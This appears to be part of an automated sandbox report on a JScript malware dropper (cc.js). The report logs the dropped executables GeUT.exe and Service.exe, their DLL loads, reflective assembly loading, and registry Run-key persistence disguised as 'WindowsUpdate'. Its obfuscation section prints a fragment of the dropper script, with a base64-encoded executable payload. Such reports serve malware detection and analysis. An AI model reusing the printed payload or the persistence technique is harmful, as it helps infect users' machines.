Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: sspicli.dll

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\GeUT.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: cc.js

Static file information: File size 1729444 > 1048576

Source:	Binary string: \Desktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdb source: Service.exe, 00000018.00000002.2501892107.00000000028FF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \Desktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdbT3n3 `3_CorDllMainmscoree.dll source: Service.exe, 00000018.00000002.2501892107.00000000028FF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: ktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdb source: GeUT.exe, 00000011.00000002.2421295277.0000000002AAF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\IzzyMichiel\Desktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdbT3n3 `3_CorDllMainmscoree.dll source: GeUT.exe, 00000002.00000002.2148006746.0000000004DC0000.00000004.08000000.00040000.00000000.sdmp, GeUT.exe, 00000002.00000002.2147849334.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.2255004351.0000000003359000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.2255004351.0000000003327000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.2255004351.0000000003329000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 0000000B.00000002.2338909006.0000000002891000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002AF6000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002AAD000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.00000000029C9000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.00000000029C7000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002A63000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002819000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.00000000028B3000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002817000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002866000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.00000000028F6000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002946000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.00000000028FD000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\IzzyMichiel\Desktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdb source: GeUT.exe, 00000002.00000002.2148006746.0000000004DC0000.00000004.08000000.00040000.00000000.sdmp, GeUT.exe, 00000002.00000002.2147849334.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.2255004351.0000000003359000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.2255004351.0000000003327000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.2255004351.0000000003329000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 0000000B.00000002.2338909006.0000000002891000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002AF6000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002AAD000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.00000000029C9000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.00000000029C7000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002A63000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002819000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.00000000028B3000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002817000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002866000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.00000000028F6000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002946000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.00000000028FD000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: ktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdbT3n3 `3_CorDllMainmscoree.dll source: GeUT.exe, 00000011.00000002.2421295277.0000000002AAF000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: WScript.Sleep(0);WScript.Sleep(1000);ZrshnIkzr = '' XLSJBrjTTVfbj = 60;var umxzSxEEWdqHpaqxQRJlALrQLUdXtWpCGtfawWlRXmBhbCMRsWDEWpjivhoxThKzonAw = 'uQBtgsONJJoIIMeXTlgRJxeOinxqbBsoCPWcUJXebWYltfoHCngDGjnxlmLsuYlIRzGtpBCKNCpnYsVCzqnnVoiTcZrixfjDkQUtYuRAlWqEtzZtRJsEkxmcRmRQKUMhTmCHXbd';EZmCzyeaczyQomfS = 2;var nescldAqRJIlGwRVqfoeyvmdmMoRLDXvnTPdfyraZvkqptTgicaJyAUrrOqZpjeOlNxnhnqrnNFCLwottIiidOwmyXmQISlqQVEcvfyumiWkvSguawfgAwlXQKoJBZjU = 'bOlpsLxNJnwurMrgqrqLmFpUkgMlrotNzBJhgrCOyRWMAqfETHTKjXhWYQEMzMWVuiuqCKzzobNVidUtAHRjViecUmIPmqPmvBSRwpBJITVHJMovwKLrunzLESWQBkMyLbZgLDxKGIbBNWSHyMTbeYrICGNdTlHX';ZrshnIkzr = ZrshnIkzr + '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

Source: GeUT.exe.0.dr, Program.cs	.Net Code: MusicPlayer System.Reflection.Assembly.Load(byte[])
Source: 0.3.wscript.exe.26357946390.0.raw.unpack, Program.cs	.Net Code: MusicPlayer System.Reflection.Assembly.Load(byte[])
Source: 0.2.wscript.exe.263586370e0.0.raw.unpack, Program.cs	.Net Code: MusicPlayer System.Reflection.Assembly.Load(byte[])
Source: Service.exe.2.dr, Program.cs	.Net Code: MusicPlayer System.Reflection.Assembly.Load(byte[])

Source: GeUT.exe.0.dr	Static PE information: section name: .text entropy: 7.937538668947789
Source: Service.exe.2.dr	Static PE information: section name: .text entropy: 7.937538668947789

Persistence and Installation Behavior

Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Local\Temp\GeUT.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	File created: C:\Users\user\AppData\Roaming\Service.exe			Jump to dropped file

Boot Survival

Source: C:\Users\user\AppData\Roaming\Service.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows
Source: C:\Users\user\AppData\Roaming\Service.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows
Source: C:\Users\user\AppData\Roaming\Service.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
